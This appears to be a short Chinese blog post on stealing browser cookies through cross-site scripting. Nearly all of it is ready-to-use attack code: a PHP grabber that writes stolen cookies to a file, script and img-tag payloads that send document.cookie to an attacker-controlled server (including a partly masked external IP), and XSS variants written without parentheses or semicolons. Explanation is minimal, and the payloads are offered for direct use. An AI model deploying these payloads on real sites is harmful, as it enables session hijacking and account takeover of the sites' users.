XSS拿Cookie

payload:
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XSS injection#exploit-code-or-poc

XSS/grabber.php

<?php
// How to use it
echo "
<script>new Image().src=\"http://localhost/XSS/grabber.php?c=\"+document.cookie;</script>
";

// Write the cookie in a file
$cookie = $_GET['c'];
$fp = fopen('cookies.txt', 'a+');
fwrite($fp, 'Cookie:' .$cookie.'\r\n');
fclose($fp);

?>

在这里插入图片描述

或者:
直接在grabber.php里这样写:

<?php
// How to use it
session_start();
echo "
<script>new Image().src=\"http://95.a.b.c:8080/?c=\"+document.cookie;</script>
";

?>

然后访问:http://localhost/grabber.php
Cookie(内容为PHPSESSIONID)发送成功。
在这里插入图片描述

其他Payload:

<img src=x οnerrοr=this.src='http://yourserver/?c='+document.cookie>
<img src=https://github.com/favicon.ico width=0 height=0 οnlοad=this.src='http://yourserver/?'+document.cookie>

不用括号和分号XSS:

<script>onerror=alert;throw 1337</script>
<script>{onerror=alert}throw 1337</script>

在这里插入图片描述
参考:https://portswigger.net/blog/xss-without-parentheses-and-semi-colons

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值